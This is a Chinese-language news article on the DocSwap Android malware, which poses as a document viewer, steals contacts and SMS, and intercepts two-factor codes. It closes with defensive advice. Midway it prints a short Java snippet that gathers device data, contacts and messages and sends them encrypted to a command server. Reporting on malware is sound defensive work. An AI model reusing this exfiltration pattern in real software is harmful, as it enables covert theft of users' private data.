一场名为 “DocSwap” 的复杂恶意软件攻击活动浮出水面,它伪装成一款合法的文档安全与查看应用程序,将全球的Android 用户作为攻击目标。
该恶意软件运用社会工程策略,诱骗用户安装看似是生产力工具的程序,实则在受害者设备上悄然建立持久存在,并窃取敏感信息。
最初的感染通常通过网络钓鱼邮件或受攻击的网站进行,这些邮件和网站将这款假的文档查看器宣传为安全打开 PDF 和办公文件的解决方案。
安装后,DocSwap 会请求广泛的权限,包括访问联系人、存储以及短信功能。
S2W 安全分析师指出,一旦安装,该恶意软件会使用加密协议与命令控制服务器建立连接,以此绕过标准检测方法。他们的分析显示,在过去三周内,亚洲、欧洲和北美的感染数量大幅激增。
该恶意软件采用了复杂的混淆技术来隐藏其恶意代码。当应用程序被打开时,它确实会展示文档查看功能,同时在后台执行其有效载荷,这使得普通用户很难检测到异常。
DocSwap 的核心功能依赖于一个原生库,该库执行以下代码:
private void exfiltrateData() {
String deviceInfo = getDeviceInfo();
String contactsList = getContacts();
String smsData = getMessages();
new AsyncTask() {
@Override
protected Void doInBackground(Void… params) {
sendToC2Server(encryptData(deviceInfo + contactsList + smsData));
return null;
}
}.execute();}
攻击分析
该恶意软件采用多阶段感染过程,起始于一个释放器组件。这个初始有效载荷看似无害,但包含一个加密的有效载荷,该载荷会在预定延迟后解密。
这种技术有助于躲避安全研究人员常用的沙盒分析和动态扫描工具。
对网络流量的分析表明,DocSwap 主要与位于东欧和东南亚的服务器通信,使用一种模仿合法 HTTPS 流量的自定义协议。
DocSwap 最令人担忧的方面是它能够拦截并转发身份验证短信,这可能危及双因素身份验证。
安全专家建议立即卸载任何可疑的文档查看应用程序,并使用可靠的杀毒软件对设备进行全面扫描。用户还应启用谷歌应用商店保护功能,并避免从未知来源安装应用程序。
发表评论
您还未登录,请先登录。
登录